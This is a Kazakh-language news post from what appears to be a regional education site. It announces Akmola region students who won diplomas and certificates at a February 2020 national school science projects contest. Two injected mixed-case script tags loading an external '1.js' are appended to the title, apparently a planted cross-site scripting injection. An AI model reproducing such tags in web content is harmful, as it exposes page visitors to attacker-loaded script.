2020 жылдың 11-14 ақпан аралығында өткен республикалық ғылыми жобалар байқауының қорытындысы туралы ақпарат<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

15.02.2020

Ғылым мен білімді интеграциялау, ұрпақтар сабақтастығын нығайту, еліміздің болашақ ғылыми әлеуетін қалыптастыру мақсатында 2020 жылдың 11-14 ақпан аралығында Алматы қаласы, Әл-Фараби атындағы Қазақ Ұлттық университетінің базасында жалпы білім беретін пәндер бойынша 8-11 сынып оқушыларына арналған республикалық ғылыми жобалар байқауының республикалық кезеңі өткізілді.

Ақмола облысының намысын 15 оқушы қорғады.

Байқау қорытындысы бойынша І дәрежелі дипломдармен келесі оқушылар марапатталды:

1. «Химия» секциясы бойынша Жанабеков Аян және Кузтаева Айзере - Көкшетау қаласы, дарынды балаларға арналған №3 облыстық мамандандырылған мектеп-интернатының 10 сынып оқушылары.

ІІІ дәрежелі дипломдармен келесі оқушылар марапатталды:

1. «Тіл білімі» секциясы бойынша Маралов Бахтияр – Көкшетау қаласы, №19 орта мектебінің 9 сынып оқушысы;

2. «Әдебиет» секциясы бойынша Маратов Нуржан - Көкшетау қаласы, "Білім-инновация" лицей-интернатының 9 сынып оқушысы.

Грамотамен келесі оқушылар марапатталды:

1. "Физика"секциясы бойынша Азатбек Армангүл - Ақкөл ауданы Өрнек орта мектебінің 9 сынып оқушысы;

2. "Жер және ғарыш туралы ғылым"   секциясы бойынша Шлейнингер Никита - Бурабай ауданы, С.Сейфуллин атындағы орта мектебінің 10 сынып оқушысы;

3. «Информатика» секциясы бойынша Шарипов Амирлан Көкшетау қаласы, Білім - инновация лицей-интернатының 10 сынып оқушысы;

4. "Информатика" секциясы бойынша Даминов Арслан - Көкшетау қаласы, Білім - инновация лицей-интернатының 10 сынып оқушысы;

5. "Биология" секциясы бойынша Гайсина Мерейлім - Көкшетау қаласы, ІТ мектеп-лицейінің 11 сынып оқушысы;

6. "Биология" секциясы бойынша Думанбек Шынар - Көкшетау қаласы, дарынды балаларға арналған № 3 облыстық  мамандандырылған мектеп-интернатының 11 сынып оқушысы;

7. "Химия" секциясы бойынша Прокопьева Виктория - Бурабай ауданы, Щучье  қаласы    №1 мектеп-гимназиясының 10 сынып оқушысы;

8. "Өлкетану" секциясы бойынша Ермуканова Асем - Зеренді ауданы, Зеренді №2 орта мектебінің 10 сынып оқушысы;

9. "Тіл білімі" секциясы бойынша Олжабай Шыңғыс - Шортанды ауданы, Степная орта мектебінің 10 сынып оқушысы;

10. "Әдебиет" секциясы бойынша Садвакасова Жаннур - Көкшетау қаласы, ІТ мектеп-лицейінің 11 сынып оқушысы;

11.  "Тарих" секциясы бойынша Қапсалям Нұрәділет - Көкшетау қаласы, дарынды балаларға арналған № 3 облыстық  мамандандырылған мектеп-интернатының 10 сынып оқушысы.

Жеңімпаздарымыз бен жүлдегерлерімізді құттықтаймыз!

Просмотров: 464


Пікір қосу



Деректерді қолтаңбаға қосу